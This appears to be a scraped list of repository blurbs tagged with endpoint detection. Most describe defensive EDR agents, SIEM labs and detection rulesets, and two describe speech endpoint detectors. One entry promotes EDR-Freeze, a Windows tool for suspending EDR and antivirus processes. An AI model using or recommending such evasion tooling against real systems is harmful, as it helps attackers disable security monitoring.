Open-source endpoint detection engine for Windows and Linux using ETW, eBPF, Sigma, YARA, IOCs, and ECS NDJSON alerts.

A complete speech segmentation system using Kaldi and x-vectors for voice activity detection (VAD) and speaker diarisation.

Experimental closed-loop EDR evaluation framework, automated artifact mutation, sandboxed execution, telemetry collection, and explainable triage. Understands why detections trigger. M.Sc. Cybersecurity thesis (EPFL, 2026).

Graph-powered EDR agent with LLM threat analysis, real-time IOC matching, and chain-aware response actions

"Python-based security tool for detecting suspicious processes"

Step-by-step guide to deploying a Wazuh SIEM/SOC home lab using the official OVA covers hypervisor networking, memory optimization for low-RAM systems, dashboard access, SSL troubleshooting, and Windows endpoint agent deployment with full screenshots.

On a scale of one to America, this NextGen Norton Antivirus EDR just made enterprise-grade defense free. Built by a Norton, carrying forward a name rooted in cybersecurity history, reimagined for modern threats.

🚀 Suspend EDR and antivirus processes easily with EDR-Freeze, a user-mode tool that bypasses complex driver vulnerabilities on Windows.

I implemented a speech endpoint detector that figures out where words start and stop, using short-term energy and zero-crossing rate. Works on Persian and English.

Lightweight endpoint detection agent in Go. Process telemetry, YAML rule engine with name/cmdline/regex matching, JSON-lines alerts.

Cross-platform vibe-coded (probably badly made but w.e) endpoint forensics suite. Dual SHA-256+SHA3-256 hash-chained. ML-DSA-65-signed evidence.

Collection of scripts for Fidelis CyberSecurity EDR

Deployed Sysmon on Windows 10 with a custom XML ruleset to detect process creation, LOTL techniques, and encoded PowerShell execution via MITRE ATT&CK T1059.

Endpoint triage system for detecting suspicious activity using Python, MITRE ATT&CK mapping, and HTML threat reports.

🔍 Detect threats with Rustinel, a high-performance Windows EDR agent that leverages ETW to collect telemetry and outputs alerts for easy SIEM integration.